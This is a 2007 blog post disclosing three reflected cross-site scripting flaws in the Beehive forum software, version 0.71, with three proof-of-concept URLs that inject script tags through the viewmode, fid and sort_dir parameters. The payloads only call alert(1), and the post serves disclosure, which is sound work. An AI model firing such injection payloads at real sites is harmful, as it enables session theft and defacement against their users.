Beehive Zero Vulnerabilities - Myth BUSTED


In the pursuit of accurate statements about application security, Ory Segal took a new shot at Beehive, the last bulletin board which I considered bug free in 2006. Well it didn’t take him long to find not one, not two but three new Beehive XSS vulnerabilities . I have installed Beehive 0.71 and indeed the vulnerabilities are confirmed.

/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=>"’><script>alert(1);</script>
/forum/links.php?webtag=FOEUM_NAME&fid=>"’><script>alert(1);</script>&viewmode=1
/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=0&page=1&sort_by=CREATED&sort_dir="><script>alert(1)</script>

What started as a quick secunia browsing for forum vulnerabilities turned into vulnerability assessments :) That was cool and maybe it’s a nice idea to continue these tests. I’ll post more on this topic.

Ory gets all the credit for this one and, again, I updated the forum vulnerabilities post .

So, in true MythBusters‘ style :
Zero vulnerabilities in any of the 10 most popular open source forums in 2006/2007 : Myth BUSTED

Share This

If you enjoyed this post, make sure you subscribe to my RSS feed!



Thank you for reading this post. You can now Read Comment (1) or Leave A Trackback.

Post Info

This entry was posted on Sunday, June 10th, 2007 and is filed under Vulnerabilities, Web Applications.

You can follow any responses to this entry through the Comments Feed. You can Leave A Comment, or A Trackback.



Previous Post: NuFW 2.2 - An Authenticating Firewall »
Next Post: Online vs. Offline Gambling »

Read More

Related Reading:

Latest Posts:

One Response to “Beehive Zero Vulnerabilities - Myth BUSTED



Leave a Reply

Note: Any comments are permitted only because the site owner is letting you post, and any comments will be removed for any reason at the absolute discretion of the site owner.

Close
E-mail It